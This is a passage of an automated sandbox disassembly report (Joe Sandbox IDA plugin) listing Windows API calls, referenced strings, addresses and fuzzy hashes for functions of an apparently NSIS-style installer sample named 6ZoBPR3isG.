EnableMenuItem.USER32(00000000), ref: 0040417F
SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404197
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
SetWindowTextW.USER32(?,00423728), ref: 004041E8
ShowWindow.USER32(?,0000000A), ref: 0040431C

Strings

(7B, xrefs: 004041C4

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: (7B
API String ID: 184305955-3251261122
Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

Function 00403AD8 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,761336C0,00435000,00000000), ref: 00403B59
lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00435800), ref: 00403C40

Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C

RegisterClassW.USER32(004291E0), ref: 00403C7D
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
ShowWindow.USER32(00000005,00000000), ref: 00403D00
GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
RegisterClassW.USER32(004291E0), ref: 00403D42
DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61

Strings

.DEFAULT\Control Panel\International, xrefs: 00403B44
(7B, xrefs: 00403B04
RichEdit20W, xrefs: 00403D24, 00403D2A
Control Panel\Desktop\ResourceLocale, xrefs: 00403B0C
_Nb, xrefs: 00403C5C, 00403CC4
.exe, xrefs: 00403BE6
RichEdit, xrefs: 00403D33
RichEd32, xrefs: 00403D14
RichEd20, xrefs: 00403D06

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1425696872
Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

Function 0040451E Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,?), ref: 004045BC
GetDlgItem.USER32(?,000003E8), ref: 004045D0
SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004045ED
GetSysColor.USER32(?), ref: 004045FE
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
lstrlenW.KERNEL32(?), ref: 0040461F
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
GetDlgItem.USER32(?,0000040A), ref: 0040469A
SendMessageW.USER32(00000000), ref: 004046A1
GetDlgItem.USER32(?,000003E8), ref: 004046CC
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
SetCursor.USER32(00000000), ref: 00404720
LoadCursorW.USER32(00000000,00007F00), ref: 00404739
SetCursor.USER32(00000000), ref: 0040473C
SendMessageW.USER32(00000111,?,00000000), ref: 0040476B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D

Strings

N, xrefs: 004046BA

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N
API String ID: 3103080414-1130791706
Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4

Function 00404850 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040489F
SetWindowTextW.USER32(00000000,?), ref: 004048C9
SHBrowseForFolderW.SHELL32(?), ref: 0040497A
CoTaskMemFree.OLE32(00000000), ref: 00404985
lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5

Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45

Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 00406706

GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 00404A98
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3

Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

A, xrefs: 00404973
(7B, xrefs: 0040494D

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$A
API String ID: 2624150263-3645020878
Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D

Function 00406034 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004061CF,?,?), ref: 0040606F
GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078

Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
wsprintfA.USER32 ref: 004060B3
GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
GlobalFree.KERNEL32(00000000), ref: 0040619C
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3

Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405F04

Strings

%ls=%ls, xrefs: 004060A9
[Rename], xrefs: 0040611D, 0040612F

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD

Function 00402F30 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402F44
GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60

Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405F04

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0

Strings

soft, xrefs: 00403020
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
Null, xrefs: 00403029
Inst, xrefs: 00403017
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
Error launching installer, xrefs: 00402F80

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-787788815
Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

Function 0040640A Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 209stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
CoTaskMemFree.OLE32(00000000), ref: 004065B3
lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-730719616
Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

Function 004043C6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004043E3
GetSysColor.USER32(00000000), ref: 00404421
SetTextColor.GDI32(?,00000000), ref: 0040442D
SetBkMode.GDI32(?,?), ref: 00404439
GetSysColor.USER32(?), ref: 0040444C
SetBkColor.GDI32(?,?), ref: 0040445C
DeleteObject.GDI32(?), ref: 00404476
CreateBrushIndirect.GDI32(?), ref: 00404480

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A

Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405FD5

SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
Opcode Fuzzy Hash: 1fdfab34e77cf90ebe23e3371142485a67670726d5f4eeccdfcf92a02d0001b8
Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

Function 00405450 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
Opcode Fuzzy Hash: b84216cbe2d5722ff5c8c30ae43643c8050e8425152119dcc0cd5bf76baef7c3
Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8

Function 00402E8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000), ref: 00402EA9
GetTickCount.KERNEL32 ref: 00402EC7
wsprintfW.USER32 ref: 00402EF5

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
ShowWindow.USER32(00000000,00000005), ref: 00402F27

Part of subcall function 00402E72: MulDiv.KERNEL32(?,00000064,?), ref: 00402E87

Strings

... %d%%, xrefs: 00402EEF

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE

Function 00404D1A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
GetMessagePos.USER32 ref: 00404D3D
ScreenToClient.USER32(?,?), ref: 00404D57
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F

Strings

f, xrefs: 00404D6B

Memory Dump Source

Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
